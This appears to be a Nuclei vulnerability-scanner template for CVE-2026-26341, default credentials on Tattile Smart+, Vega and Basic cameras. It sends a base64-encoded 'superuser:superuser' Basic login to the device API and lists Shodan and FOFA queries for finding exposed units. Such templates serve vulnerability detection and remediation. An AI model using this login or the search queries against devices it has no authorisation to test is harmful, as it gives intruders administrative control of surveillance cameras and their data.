id: CVE-2026-26341

info:
  name: Tattile Camera < 1.181.5 - Default Login
  author: 0x_Akoko
  severity: high
  description: |
    Tattile Smart+, Vega, and Basic device families firmware <= 1.181.5 contain a broken authentication caused by default credentials not forced to be changed, letting attackers with management interface access gain administrative privileges.
  impact: |
    Attackers can gain administrative access to device configuration and data, leading to unauthorized control and data exposure.
  remediation: |
    Update firmware to a version later than 1.181.5 or the latest available version.
  reference:
    - https://www.cve.org/CVERecord?id=CVE-2026-26341
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cvss-score: 9.3
    cve-id: CVE-2026-26341
    epss-score: 0.08914
    epss-percentile: 0.92719
    cwe-id: CWE-1392
    cpe: cpe:2.3:o:tattile:smart\+_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"Tattile camera manager"
    fofa-query: icon_hash=="2030104257"
  tags: cve,cve2026,tattile,default-login,camera,iot

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "Tattile camera manager")
        condition: and
        internal: true

  - raw:
      - |
        GET /api/v1/security/login HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic c3VwZXJ1c2VyOnN1cGVydXNlcg==

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, "text/plain")
          - regex("^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$", body)
        condition: and
# digest: 490a0046304402203ee1aca5dc0d65919cddc1285d21dcf3d846d6db4a2f70311859f9cee843f12202202473ceefbda5b99665c0dedd1721effbb36d17ea800f212b6e51270fd5930ba3:922c64590222798bb761d5b6d8e72950